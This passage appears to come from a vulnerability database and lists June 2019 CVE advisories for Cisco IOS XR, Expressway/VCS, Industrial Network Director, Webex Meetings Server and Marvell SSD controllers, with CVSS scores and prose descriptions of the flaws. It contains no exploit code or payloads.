CVSS V2: 5.5 CVSS V3: 5.4 Severity: MEDIUM |
A vulnerability in the Secure Shell (SSH) authentication function of Cisco IOS XR Software could allow an authenticated, remote attacker to successfully log in to an affected device using two distinct usernames. The vulnerability is due to a logic error that may occur when certain sequences of actions are processed during an SSH login event on the affected device. An attacker could exploit this vulnerability by initiating an SSH session to the device with a specific sequence that presents the two usernames. A successful exploit could result in logging data misrepresentation, user enumeration, or, in certain circumstances, a command authorization bypass. See the Details section for more information. Cisco IOS XR There is an authorization vulnerability in the software.Information may be obtained and information may be altered.
An attacker can exploit this issue to gain unauthorized access, perform unintended actions and cause denial-of-service conditions. This may lead to further attacks.
This issue is being tracked by Cisco Bug ID CSCvo03672. This vulnerability stems from the lack of authentication measures or insufficient authentication strength in network systems or products.
| VAR-201906-0683 | CVE-2019-1845 | Multiple Cisco products: vulnerability related to input validation |
CVSS V2: 5.0 CVSS V3: 8.6 Severity: HIGH |
A vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&P) Service, Cisco TelePresence Video Communication Server (VCS), and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient controls for specific memory operations. An attacker could exploit this vulnerability by sending a malformed Extensible Messaging and Presence Protocol (XMPP) authentication request to an affected system. A successful exploit could allow the attacker to cause an unexpected restart of the authentication service, preventing users from successfully authenticating. Exploitation of this vulnerability does not impact users who were authenticated prior to an attack. Multiple Cisco Products are prone to a denial-of-service vulnerability.
This issue is being tracked by Cisco Bug IDs CSCvn00361 and CSCvp51956. Cisco Expressway Series and the other affected products are all products of Cisco. The vulnerability stems from the failure of the network system or product to properly validate the input data.
| VAR-201906-0290 | CVE-2019-1881 | Cisco Industrial Network Director Vulnerable to cross-site request forgery |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device. For more information about CSRF attacks and potential mitigations, see Understanding Cross-Site Request Forgery Threat Vectors. Cisco Industrial Network Director is prone to a cross-site request-forgery vulnerability.
This issue is being tracked by Cisco bug ID CSCvm30050. The system provides automatic management through visual operation of industrial Ethernet infrastructure. The vulnerability stems from the web application not adequately verifying that the request comes from a trusted user.
| VAR-201906-0291 | CVE-2019-1882 | Cisco Industrial Network Director Vulnerable to cross-site scripting |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
A vulnerability in Cisco Industrial Network Director could allow an authenticated, remote attacker to conduct stored cross-site scripting (XSS) attacks. The vulnerability is due to improper validation of content submitted to the affected application. An attacker could exploit this vulnerability by sending requests containing malicious values to the affected system. A successful exploit could allow the attacker to conduct XSS attacks.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
This issue is being tracked by Cisco Bug ID CSCvm22833. The system provides automatic management through visual operation of industrial Ethernet infrastructure. The vulnerability stems from the lack of correct validation of client data in the web application.
| VAR-201906-0294 | CVE-2019-1868 | Cisco Webex Meetings Server Vulnerable to information disclosure |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the web-based management interface of Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to access sensitive system information. The vulnerability is due to improper access control to files within the web-based management interface. An attacker could exploit this vulnerability by sending a malicious request to an affected device. A successful exploit could allow the attacker to access sensitive system information. Cisco Webex Meetings Server contains an information disclosure vulnerability. Information may be obtained.
This issue is being tracked by Cisco bug ID CSCvn76141. Cisco WebEx Meetings Server (CWMS) is a multi-functional conferencing solution in the WebEx product line that includes audio, video and web conferencing. This vulnerability stems from configuration errors in network systems or products during operation.
| VAR-201906-1092 | CVE-2019-10637 | Multiple Marvell SSD Controller devices: vulnerabilities related to security functions |
CVSS V2: 2.1 CVSS V3: 4.6 Severity: MEDIUM |
Multiple Marvell SSD Controller devices contain vulnerabilities related to security functions. Information may be tampered with. Marvell SSD Controller 88SS1074 is a solid-state drive controller from Marvell. This vulnerability is due to the lack of security measures such as authentication, access control, and rights management in network systems or products. The following products and versions are affected: Marvell SSD Controller 88SS1074; 88SS1079; 88SS1080; 88SS1093; 88SS1092; 88SS1095; 88SS9174; 88SS9175; 88SS9187; 88SS9188; 88SS9189; 88SS9190; 88SS1085; 88SS1087; 88SS1090; 88SS1100; 88SS1084; 88SS1088; 88SS1098.
| VAR-201906-0297 | CVE-2019-1872 | Cisco TelePresence Video Communication Server and Cisco Expressway Series Server-side request forgery vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
A vulnerability in Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series software could allow an unauthenticated, remote attacker to cause an affected system to send arbitrary network requests. The vulnerability is due to improper restrictions on network services in the affected software. An attacker could exploit this vulnerability by sending malicious requests to the affected system. A successful exploit could allow the attacker to send arbitrary network requests sourced from the affected system. Multiple Cisco products are prone to a security-bypass vulnerability.
Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks.
These issues are being tracked by Cisco Bug ID CSCvj33774.